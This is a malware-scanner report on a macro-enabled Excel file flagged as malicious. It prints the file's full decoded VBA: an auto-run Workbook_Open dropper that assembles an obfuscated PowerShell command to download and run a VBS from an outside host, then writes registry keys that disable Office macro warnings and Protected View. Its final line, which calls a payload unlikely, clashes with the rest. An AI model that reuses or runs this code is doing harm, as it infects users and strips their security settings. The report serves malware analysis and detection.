Verdict: MALICIOUS
Risk Score: 290

Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6391394-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6391394-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project — VBA macros present
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): matched line in script: `Set XmAnwXauj = CreateObject("WScript.Shell")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set XmAnwXauj = CreateObject("WScript.Shell")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): matched line in script: `Private Sub Workbook_Open()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://fast-cargo.com/images/file/vb/7.vbs: in document text (OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13499 bytes | 47e0bb0da1095944ff94ee737f84931441d15aaf2e125ce6658fe428ca4759a8 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub asdasdasd()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set XmAnwXauj = CreateObject("WScript.Shell")
Dim SowSXAzw
Dim IWonWUQjx
Dim IWnWUQj
Dim ASDnqiAxW
Dim AnxWnUN
Dim WJnzWUA
Dim ADmWnau
Dim JnWNzX
Dim MAUw2Cha
Dim MAas2Cha
Dim Wn3asni
SowSXAzw = "c"
SowSXAzw = SowSXAzw & "m"
SowSXAzw = SowSXAzw & "d"
SowSXAzw = SowSXAzw & "."
SowSXAzw = SowSXAzw & "e"
SowSXAzw = SowSXAzw & "x"
SowSXAzw = SowSXAzw & "e "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "K "
SowSXAzw = SowSXAzw & "t"
SowSXAzw = SowSXAzw & "a"
SowSXAzw = SowSXAzw & "s"
SowSXAzw = SowSXAzw & "k"
SowSXAzw = SowSXAzw & "k"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "l"
SowSXAzw = SowSXAzw & "l "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "f "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "m "
SowSXAzw = SowSXAzw & "w"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "n"
IWonWUQjx = "w"
IWonWUQjx = IWonWUQjx & "o"
IWonWUQjx = IWonWUQjx & "r"
IWonWUQjx = IWonWUQjx & "ds"
IWonWUQjx = IWonWUQjx & "."
IWonWUQjx = IWonWUQjx & "e"
IWonWUQjx = IWonWUQjx & "x"
IWonWUQjx = IWonWUQjx & "e"
IWonWUQjx = IWonWUQjx & "&"
IWonWUQjx = IWonWUQjx & "t"
IWonWUQjx = IWonWUQjx & "a"
IWonWUQjx = IWonWUQjx & "s"
IWonWUQjx = IWonWUQjx & "k"
IWonWUQjx = IWonWUQjx & "k"
IWonWUQjx = IWonWUQjx & "i"
IWonWUQjx = IWonWUQjx & "l"
IWonWUQjx = IWonWUQjx & "l "
IWonWUQjx = IWonWUQjx & "/"
IWonWUQjx = IWonWUQjx & "f "
IWonWUQjx = IWonWUQjx & "/"
IWonWUQjx = IWonWUQjx & "i"
IWonWUQjx = IWonWUQjx & "m "
IWonWUQjx = IWonWUQjx & "E"
IWonWUQjx = IWonWUQjx & "x"
IWonWUQjx = IWonWUQjx & "c"
IWnWUQj = "e"
IWnWUQj = IWnWUQj & "ls"
IWnWUQj = IWnWUQj & "."
IWnWUQj = IWnWUQj & "e"
IWnWUQj = IWnWUQj & "x"
IWnWUQj = IWnWUQj & "e"
ASDnqiAxW = "&"
ASDnqiAxW = ASDnqiAxW & "P"
ASDnqiAxW = ASDnqiAxW & "o"
ASDnqiAxW = ASDnqiAxW & "w"
ASDnqiAxW = ASDnqiAxW & "e"
ASDnqiAxW = ASDnqiAxW & "r"
ASDnqiAxW = ASDnqiAxW & "S"
ASDnqiAxW = ASDnqiAxW & "h"
ASDnqiAxW = ASDnqiAxW & "e"
AnxWnUN = "l"
AnxWnUN = AnxWnUN & "l "
AnxWnUN = AnxWnUN & "("
AnxWnUN = AnxWnUN & "N"
AnxWnUN = AnxWnUN & "e"
AnxWnUN = AnxWnUN & "w"
AnxWnUN = AnxWnUN & "-"
AnxWnUN = AnxWnUN & "O"
AnxWnUN = AnxWnUN & "b"
AnxWnUN = AnxWnUN & "j"
AnxWnUN = AnxWnUN & "e"
AnxWnUN = AnxWnUN & "c"
AnxWnUN = AnxWnUN & "t "
AnxWnUN = AnxWnUN & "S"
AnxWnUN = AnxWnUN & "y"
AnxWnUN = AnxWnUN & "s"
AnxWnUN = AnxWnUN & "t"
AnxWnUN = AnxWnUN & "e"
WJnzWUA = "m"
WJnzWUA = WJnzWUA & "."
WJnzWUA = WJnzWUA & "N"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "t"
WJnzWUA = WJnzWUA & "."
WJnzWUA = WJnzWUA & "W"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "b"
WJnzWUA = WJnzWUA & "C"
WJnzWUA = WJnzWUA & "l"
WJnzWUA = WJnzWUA & "i"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "n"
WJnzWUA = WJnzWUA & "t"
WJnzWUA = WJnzWUA & ")"
WJnzWUA = WJnzWUA & "."
ADmWnau = "D"
ADmWnau = ADmWnau & "o"
ADmWnau = ADmWnau & "w"
ADmWnau = ADmWnau & "n"
ADmWnau = ADmWnau & "l"
ADmWnau = ADmWnau & "o"
ADmWnau = ADmWnau & "a"
ADmWnau = ADmWnau & "d"
ADmWnau = ADmWnau & "F"
ADmWnau = ADmWnau & "i"
ADmWnau = ADmWnau & "l"
ADmWnau = ADmWnau & "e"
ADmWnau = ADmWnau & "("
ADmWnau = ADmWnau & "'http://fast-cargo.com/images/file/vb/7.vbs'"
JnWNzX = ","
JnWNzX = JnWNzX & "'"
JnWNzX = JnWNzX & "%"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "p"
JnWNzX = JnWNzX & "p"
JnWNzX = JnWNzX & "d"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "t"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "%"
JnWNzX = JnWNzX & "\"
JnWNzX = JnWNzX & "I"
MAUw2Cha = "n"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "e"
MAUw2Cha = MAUw2Cha & "r"
MAUw2Cha = MAUw2Cha & "n"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "e"
MAUw2Cha = MAUw2Cha & "."
MAUw2Cha = MAUw2Cha & "v"
MAUw2Cha = MAUw2Cha & "b"
MAUw2Cha = MAUw2Cha & "s"
MAUw2Cha = MAUw2Cha & "'"
MAUw2Cha = MAUw2Cha & ")"
MAUw2Cha = MAUw2Cha & ";"
MAUw2Cha = MAUw2Cha & "S"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "a"
MAUw2Cha = MAUw2Cha & "r"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "-"
MAas2Cha = "P"
MAas2Cha = MAas2Cha & "r"
MAas2Cha = MAas2Cha & "o"
MAas2Cha = MAas2Cha & "c"
MAas2Cha = MAas2Cha & "e"
MAas2Cha = MAas2Cha & "s"
MAas2Cha = MAas2Cha & "s "
MAas2Cha = MAas2Cha & "'"
MAas2Cha = MAas2Cha & "%"
MAas2Cha = MAas2Cha & "a"
MAas2Cha = MAas2Cha & "p"
MAas2Cha = MAas2Cha & "p"
MAas2Cha = MAas2Cha & "d"
MAas2Cha = MAas2Cha & "a"
MAas2Cha = MAas2Cha & "t"
MAas2Cha = MAas2Cha & "a"
Wn3asni = "%"
Wn3asni = Wn3asni & "\"
Wn3asni = Wn3asni & "I"
Wn3asni = Wn3asni & "n"
Wn3asni = Wn3asni & "t"
Wn3asni = Wn3asni & "e"
Wn3asni = Wn3asni & "r"
Wn3asni = Wn3asni & "n"
Wn3asni = Wn3asni & "t"
Wn3asni = Wn3asni & "e"
Wn3asni = Wn3asni & "."
Wn3asni = Wn3asni & "v"
Wn3asni = Wn3asni & "b"
Wn3asni = Wn3asni & "s"
Wn3asni = Wn3asni & "'"
SowSXAzw2 = SowSXAzw + IWonWUQjx + IWnWUQj + ASDnqiAxW + AnxWnUN + WJnzWUA + ADmWnau + JnWNzX + MAUw2Cha + MAas2Cha + Wn3asni
XmAnwXauj.Run SowSXAzw2, vbHide
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 48640 bytes | 780feea007da3040fe70336be1a528cbd9b91e63bc16fc64d0c00e77ed374ac0 |

Detection
ClamAV: Doc.Macro.Obfuscation-6391394-0
Obfuscation or payload: unlikely